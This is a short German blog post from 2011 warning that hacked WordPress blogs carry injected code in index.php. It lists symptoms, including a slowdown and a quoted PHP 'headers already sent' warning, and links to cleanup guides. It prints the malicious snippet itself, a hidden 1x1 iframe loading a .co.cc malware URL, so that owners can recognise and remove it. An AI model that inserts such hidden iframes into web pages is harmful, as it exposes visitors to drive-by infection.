Finger weg: Malware *.co.cc im iframe
Dienstag, 29. März 2011Viele WordPress Blogs werden leider wieder zu illegalen Zwecken mißbraucht und gehackt. Im eingefügten Schadcode in der index.php befindet sich beispielsweise ein Frame <i frame …> mit URL zu defrnezk.co.cc – gehostet bei elaninet.com.
Wie spannt man, dass das Blog “gehackt” wurde? Nun, die Geschwindigkeit wird erheblich langsamer und eine PHP Meldung steht oben auf der Webseite, siehe unten.
Weitere nützliche Hinweise im Web bei:
- http://bueltge.de/wordpress-gehackt-was-tun-eine-schnellhilfe/1150/
- https://secure.servage.net/wiki/Security
Ganz klar muss man sagen, dass die Hacker Verbrecher sind, ob es aber jemals gelingen wird, Ihnen das Handwerk zu legen, das steht in den Sternen ….
Beispielsfehlermeldung bei WordPress Aufruf:
Warning: Cannot modify header information – headers already sent by (output started at /mounted-storage/home1/sub002/sc20514-CZQT/marketingserver.info/index.php(1) : eval()’d code:37) in /mounted-storage/home1/sub002/sc20514-CZQT/marketingserver.info/wp-includes/pluggable.php on line 890
Schadcode:
<iframe src=”http://defrnezk.co.cc/QQkFBg0MBAEDAAABEkcJBQcEBAYDBAAMBA==” width=”1″ height=”1″></iframe>